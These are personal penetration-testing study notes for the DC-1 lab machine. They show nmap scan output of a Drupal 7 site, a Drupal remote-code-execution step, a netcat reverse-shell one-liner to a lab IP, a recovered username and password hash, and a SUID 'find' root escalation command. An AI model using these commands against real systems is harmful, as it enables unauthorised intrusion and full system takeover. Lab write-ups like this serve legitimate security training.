O
O
OSCP Notes
Search
K
Comment on page

DC-1

22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37701/tcp status
| 100024 1 39759/udp6 status
| 100024 1 45295/tcp6 status
|_ 100024 1 55275/udp status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
running the nikto reveals it's running drupal 7
This means that it's most likely vulnerable to RCE.
The script tries to execute "id" command by default and running the script shows it was successful. Now we have RCE.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.164 4545 >/tmp/f
Reverse shell command worked. (Ensure to use double quotes around the commands or you'll receive a reverse shell from your own machine)

Priv Esc

R0ck3t
$S$DAK00p3Dkojkf4O/UizYxenguXnjv
SUID binary find found
ran the command from and we are root!! https://gtfobins.github.io/gtfobins/find/
find . -exec "/bin/bash" -p \;